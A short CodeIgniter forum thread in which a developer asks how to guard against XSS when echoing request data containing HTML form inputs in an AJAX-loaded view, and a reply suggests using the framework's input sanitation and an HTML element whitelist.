Welcome Guest, Not a member yet? Register   Sign In
security of views loaded by ajax
#1

[eluser]davdtm[/eluser]
Hi everybody, I've the following problem. I load a view by ajax (through jQuery.load()), I pass some data to such view, say 'foo', which becomes available inside the view as $_REQUEST['foo']. Within the view I need to print the value of $_REQUEST['foo'], but to prevent XSS problems I know it would be suggested to type print(htmlentities($_REQUEST['foo'])); (or htmlspecialchars(...), which is the same in this case) instead of plain print($_REQUEST['foo']);

Unfortunately, $_REQUEST['foo'] contains html inputs which should generate a form, so they cannot be passed to htmlentities(), because it would clearly translate the html tags. Doing this, I would have a list of html strings instead of the form inputs I need. For this reason I thought it would have been enough to exploit the xss_clean function provided by CI, however I cannot use get_instance() to access the controller because the view is loaded through ajax and get_instance() seems not available. Thus I cannot launch xss_clean either. I'm puzzled... what I can do to filter my output against XSS while getting the html data unchanged?

Thanks for any help, best regards

Davide
#2

[eluser]pickupman[/eluser]
As long as you are using .load for a url coming from CI, all functionality is still there. You don't need to call get_instance as it already loaded for the controller class. By $_REQUEST, you will bypass any sanitation from the input class. I would suggest much how TinyMCE does, and allow only as set of html elements. You will likely need to write quick helper to do this for you.




Theme © iAndrew 2016 - Forum software by © MyBB